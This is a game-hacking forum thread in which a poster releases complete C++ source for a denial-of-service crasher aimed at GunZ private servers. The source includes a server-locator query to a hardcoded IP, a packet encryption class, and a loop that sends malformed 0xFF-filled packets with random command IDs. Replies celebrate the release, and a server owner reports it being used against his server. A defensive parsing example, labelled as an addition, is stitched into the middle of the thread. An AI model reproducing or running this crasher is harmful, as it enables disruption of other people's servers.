Is it? cuz my gunz is down, Darkgunz is down, ??
Tsssk tsssk Phail, that's not clean C code. I'm awaiting releases like
"Private Server Destroyer V1.0 by Kyuma"
"Private Server Destroyer V1.0 by Touchwise"
"Private Server Destroyer V1.0 by [fill in a lot of other names]"
Let's sit back and enjoy .
Are you going to release a patch for this version? =S
I don't think so. I'll sit down and see what the future brings. I've heard a lot of "GunZ developers" say they can do it all, so I want to give them a chance to "do it all".
xd!!!!! Next should be SQL Injection amirite?
- Wizkid (L) (F) says (1:39 PM):
*I don't happen to care about GunZ for more than a year now, lol
*I'm just still working on LG because all the other servers are poop, spelled as s - h - i - t.
*leeching right and left
- Wizkid (L) (F) says (1:40 PM):
*then protecting leeched files with MY stuff
*which is a lose - lose situation I didn't sign for.
*in short, I'm not doing a single thing but hanging around once in a while.
*let the leechers provide a solution (inside clue: "real gunz developers").
*signed with xD
You should have started with that, it's the more fun part. Let's make a codecave check on ' in all of those functions! tt1:
Off-topic:
looooooooooooooooooooooooooooooooooooooooooooooooooooooool. I love the patch being 5 lines XD.
Yay, ego is back.
Hi, I don't care about GunZ anymore.
Revolution.cpp
Code:#include <stdio.h> #include <Windows.h> #include "Packet.h" #pragma comment (lib, "WS2_32") typedef struct Host { char szIP[64]; short nPort; }*LPHOST; LPHOST GetHostFromLocator() { WSADATA wsaData; WSAStartup (MAKEWORD (2,2), &wsaData); LPHOST lpHost = new Host(); int nRecv = 0; PCHAR lpBuffer = new char[4096]; SOCKET fd = socket (AF_INET, SOCK_DGRAM, 0); sockaddr_in sockAddr; sockAddr.sin_addr.S_un.S_addr = INADDR_ANY; sockAddr.sin_port = htons (7900); sockAddr.sin_family = AF_INET; sockaddr_in serverAddr; serverAddr.sin_addr.S_un.S_addr = inet_addr ("67.212.81.85"); serverAddr.sin_port = htons (8900); serverAddr.sin_family = AF_INET; int nSize = sizeof(sockaddr); while (true) { sendto (fd, "\x64\x00\x0b\x00\x73\x00\x05\x00\x41\x9c\x00", 11, 0, (sockaddr *)&serverAddr, sizeof(sockaddr)); nRecv = recvfrom (fd , lpBuffer, 40*** 0, (sockaddr *)&serverAddr, &nSize); if (nRecv < 1) { printf ("Failed to connect. Retrying\n"); Sleep (30000); continue; } if (nRecv > 6 && lpBuffer[0] == 100) { in_addr a; memcpy (&a, lpBuffer+23, 4); int port = 0; memcpy (&port, lpBuffer+27, 4); strcpy (lpHost->szIP, inet_ntoa (a)); lpHost->nPort = port; return lpHost; } } return NULL; } int main() { unsigned short packetIDs[] = { 0x144, 0x145, 0x3F3, 0x3F4, 0x44D, 0x4BD, 0x4D1, 0x5AC, 0x57A, 0x52A, 0x522, 0x4C6, 0x584, 0x585, 0x5B6, 0x5DE, 0x6A5, 0x6A6, 0x6B8, 0x6A8, 0x6AA, 0x6b6, 0x70a, 0x70c, 0x178, 0x71E, 0x728, 0x72D, 0x607, 0x610, 0x623, 0x619, 0x61B, 0x770, 0x7E0, 0x7E8, 0x7EA, 0x7EB, 0x803, 0xC1C, 0x177E, 0x17A3, 0x17A6, 0x1FA, 0x5209, 0x520E, 0x17D8, 0x5217, 0x9C42, 0x1F45, 0x1F43, 0x1F44, 0x723 }; SOCKET fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); sockaddr_in sockAddr; PBYTE lpBuffer; PCHAR lpTemp = 
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"; PBYTE lpKey = new BYTE[32]; ZeroMemory (lpKey, 32); while (true) { LPHOST lpHost = GetHostFromLocator(); if (lpHost == NULL) { Sleep (5000); continue; } printf ("Connecting to: %s:%i\n", lpHost->szIP, lpHost->nPort); fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); sockAddr.sin_addr.S_un.S_addr = inet_addr (lpHost->szIP); sockAddr.sin_family = AF_INET; sockAddr.sin_port = htons (lpHost->nPort); if (connect (fd, (sockaddr *)&sockAddr, sizeof(sockaddr)) == SOCKET_ERROR) { continue; } CPacket* lpPacket = new CPacket (40*** lpKey); unsigned short id = packetIDs[rand() % (sizeof(packetIDs)-1)]; printf ("Crashing with: %X\n", id); lpPacket->MakeCommand (id, 0); lpPacket->WriteData(lpTemp, 64); lpBuffer = lpPacket->FinalizePacket (100); send (fd, (PCHAR)lpBuffer, lpPacket->mSize+8, 0); printf ("Sent Packet.\n"); closesocket (fd); delete lpPacket; Sleep (50); } }
Packet.h
Code:
/* -----------------------------------------
File: Packet.h
Usage: Contains the full packet class for reading / writing to the initial buffer.
Author: Phail
-----------------------------------------*/
class CPacket
{
public:
    unsigned char *mData;
    unsigned char mKey[32];
    short mSize;

    unsigned char *BuildKey(char *pPacket)
    {
        byte Xor[] = { 0x57, 0x02,0x5B,0x04,0x34,0x06,0x01,0x08,0x37,0x0A,0x12,0x69,0x41,0x38,0x0F,0x78 };
        byte mBytes[] = { 0x37,0x04,0x5D,0x2E,0x43,0x38,0x49,0x53,0x50,0x05,0x13,0xC9,0x28,0xA4,0x4D,0x05 }; //GameNao!
        unsigned int szTmp = 0,szTmp2 = 0,szTmp3 = 0;
        memcpy(mKey,pPacket+12,4);
        memcpy(mKey+4,pPacket,12);
        memcpy(mKey+16,mBytes,16);
        for(int i=0; i<4; ++i)
        {
            memcpy(&szTmp,Xor+(i*4),4);
            memcpy(&szTmp2,mKey+(i*4),4);
            szTmp3 = szTmp ^ szTmp2;
            memcpy(mKey+(i*4),&szTmp3,4);
        }
        return (unsigned char *)mKey;
    }

    void Encrypt(unsigned char *szBuffer, int iStart, int iLength)
    {
        for(int i=0; i < iLength; ++i)
        {
            unsigned short a = szBuffer[iStart+i];
            a ^=mKey[i%32];
            a <<= 3;
            byte b = (byte)(a >> 8);
            b |= (byte)(a & 0xFF);
            b ^= 0xF0;
            szBuffer[iStart + i] = (byte)b;
        }
    }

    void Decrypt(unsigned char *szBuffer, int iStart, int iLength)
    {
        for (int i = 0; i < iLength; ++i)
        {
            byte a = szBuffer[iStart + i];
            a ^= 0x0F0;
            byte b = (byte)(7 & a);
            b <<= 5;
            a >>= 3;
            b = (byte)(a | b);
            szBuffer[iStart+i] = (byte)(b ^ mKey[i % 32]);
        }
    }

    unsigned short Checksum(unsigned char *szBuffer, int iStart, int iLength)
    {
        unsigned int uiSum = (unsigned int)(szBuffer[iStart] + szBuffer[iStart+1] + szBuffer[iStart+2] + szBuffer[iStart+3]),uiSum2=0,uiSum3=0,uiSum4=0;
        for(int i=6; i < iLength; ++i)
            uiSum2 += szBuffer[i];
        uiSum3 = uiSum2 - uiSum;
        uiSum4 = uiSum3 >> 0x10;
        uiSum3 += uiSum4;
        return (unsigned short)uiSum3;
    }

    void WriteData(void *pData, short pLength)
    {
        char cZero = 0x00;
        if(pData == 0)
        {
            for(int i=0; i < pLength; i++)
            {
                memcpy(mData+mSize,&cZero,1);
                mSize++;
            }
        }
        else
        {
            memcpy(mData+mSize,pData,pLength);
            mSize += pLength;
        }
    }

    void WriteString(char *szBuffer)
    {
        short wSize = strlen(szBuffer)+1;
        WriteData(&wSize,2);
        WriteData(szBuffer,wSize);
    }

    short ReadShort()
    {
        short s = 0;
        memcpy(&s,mData+mSize,2);
        mSize+=2;
        return s;
    }

    char *ReadString()
    {
        short wSize = ReadShort();
        char *szString = (char *)malloc(wSize);
        memset(szString,0,wSize);
        memcpy(szString,mData+mSize,wSize);
        mSize+=wSize;
        return szString;
    }

    byte ReadByte()
    {
        byte out = mData[mSize];
        mSize++;
        return out;
    }

    long ReadLong()
    {
        long out = 0;
        memcpy(&out,mData+mSize,4);
        mSize+=4;
        return out;
    }

    byte *ReadArray(short iSize)
    {
        byte *bArray = new byte[iSize];
        memset(bArray,0,iSize);
        memcpy(bArray,mData+mSize,iSize);
        mSize+=iSize;
        return bArray;
    }

    short GetLen(int iLast)
    {
        short wOut = 0;
        for(int i=mSize; i < iLast; i++,wOut++)
        {
            if(mData[i] == 0){
                wOut++;
                break;
            }
        }
        return wOut;
    }

    void SkipByte(short wSize)
    {
        mSize+=wSize;
    }

    void SetPos(short pVal)
    {
        mSize = pVal;
    }

    void WriteShort(short pIn)
    {
        memcpy((mData+mSize),&pIn,2);
        mSize+=2;
    }

    void MakeCommand(short wCommand,byte val)
    {
        char cPacketId = val;
        memcpy(mData,&wCommand,2);
        memcpy(mData+2,&cPacketId,1);
        mSize += 3;
    }

    unsigned char *FinalizePacket(unsigned short wVersion)
    {
        unsigned short wLen = mSize + 8;
        unsigned short wLen2 = mSize+2;
        unsigned short wChecksum = 0;
        unsigned char *szPacket = new unsigned char[wLen];
        byte bZero[] = {0x0,0x0};
        memset(szPacket,0,wLen);
        memcpy(szPacket,&wVersion,2);
        memcpy(szPacket+2,&wLen,2);
        if(wVersion == 0x65)Encrypt(szPacket,2,2);
        memcpy(szPacket+4,&bZero,2);
        memcpy(szPacket+6,&wLen2,2);
        memcpy(szPacket+8,mData,mSize);
        if(wVersion == 0x65)Encrypt(szPacket,6,mSize+2);
        wChecksum = Checksum(szPacket,0,wLen);
        memcpy(szPacket+4,&wChecksum,2);
        return szPacket;
    }

    CPacket(int pLen,unsigned char pKey[32])
    {
        mData = (unsigned char *)malloc(pLen);
        memset(mData,0,pLen);
        mSize = 0;
        memcpy(mKey,pKey,32);
    }

    CPacket(unsigned char *pDecrypted, short pStart, short pSize)
    {
        mData = (unsigned char *)malloc(pSize);
        memset(mData,0,pSize);
        memcpy(mData,pDecrypted,pSize);
        mSize = pStart;
    }

    CPacket(unsigned char pKey[32])
    {
        memcpy(mKey,pKey,32);
    }

    CPacket(){}

    ~CPacket()
    {
        free((void *)mData);
        mSize = 0;
    }
};
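The receiving side of the frame layout above, as an added example that is not part of the thread or of any GunZ code base: a header check plus a bounded string read that replaces the unchecked length handling of ReadString() and ReadArray() in Packet.h. The command id 0x1234 used in testing, the one-string parameter layout and the 64-byte limit are assumptions; the thread does not show how the real server parses these commands.

```cpp
// Added example, not code from the thread. Frame layout as FinalizePacket() builds it:
// [version:2][total len:2][checksum:2][data len:2][cmd:2][id:1][params...]
#include <cstdint>
#include <string>
#include <vector>
typedef std::vector<uint8_t> Bytes;
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr16(Bytes &b, size_t at, uint16_t v) { b[at] = v & 0xFF; b[at + 1] = v >> 8; }

// Same arithmetic as CPacket::Checksum (bytes 4-5 are never summed).
uint16_t frameChecksum(const Bytes &f) {
    uint32_t head = f[0] + f[1] + f[2] + f[3], body = 0;
    for (size_t i = 6; i < f.size(); ++i) body += f[i];
    uint32_t s = body - head;
    return (uint16_t)(s + (s >> 16));
}

// Constructed test input: a plain (version 100) frame around the given params.
Bytes buildFrame(uint16_t cmd, const Bytes &params) {
    Bytes f(11, 0);
    f.insert(f.end(), params.begin(), params.end());
    wr16(f, 0, 100); wr16(f, 2, (uint16_t)f.size());
    wr16(f, 6, (uint16_t)(f.size() - 6)); wr16(f, 8, cmd);
    wr16(f, 4, frameChecksum(f));
    return f;
}

// Header check: every declared length must match the bytes actually received.
bool validateFrame(const Bytes &f) {
    if (f.size() < 11 || rd16(&f[0]) != 100) return false;
    if (rd16(&f[2]) != f.size() || rd16(&f[6]) != f.size() - 6) return false;
    return rd16(&f[4]) == frameChecksum(f);
}

// Bounded replacement for the ReadShort()+ReadString() pattern: the length
// prefix is compared with the bytes remaining before anything is copied.
bool readString(const Bytes &f, size_t &pos, std::string &out, size_t maxLen) {
    if (pos > f.size() || f.size() - pos < 2) return false;
    size_t n = rd16(&f[pos]);
    if (n == 0 || n > maxLen || n > f.size() - pos - 2) return false;
    if (f[pos + 2 + n - 1] != 0) return false;   // WriteString() includes the NUL
    out.assign((const char *)&f[pos + 2], n - 1);
    pos += 2 + n; return true;
}

// Hypothetical handler for a command that takes one string parameter.
bool parseStringCommand(const Bytes &f, std::string &out) {
    size_t pos = 11;
    return validateFrame(f) && readString(f, pos, out, 64);
}
```

A frame whose parameters are 64 bytes of 0xFF has consistent lengths and checksum, so it passes validateFrame(); it is rejected only at readString(), where the length prefix reads as 0xFFFF and exceeds both the limit and the bytes remaining.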
What I'm seeing here is Theo being a butt pretending he's too badass to care, and you being too cool to do something about it.
No, you are incorrect. You don't seem to get my point. Too bad.
What I'm seeing here is Theo being a butt pretending he's too badass to care, and you being too cool to do something about it.
Oh great.
Did you give a compiled version to NicK?
Or was he smart enough to compile it himself?
He's using it to crash my server. ._________.
WooAf: Connecting to: a.b.c.d:e | Crashing with: 1F45
WooAf: Please fix the 1F45 packet.
And then he spammed the compiled version all over my shoutbox and forums.
And I got no idea why.
Great. This is so gay. >____>
That's #1.
I'm #1. "That's #1." Even better. .___________.
And when you are talking about ego...
:
When I'm talking about ego... o.o
I'm an ego-tripper on msn when I get provoked, sometimes.
I don't get what you mean though.
It's a joke which some people will understand and some won't.
Explain.
Is it good to understand it or not?
It's a joke so it's funny to understand it. But, as usual with jokes, there's always a part of humans that don't get the joke.
Let's not go further off-topic and head to bed.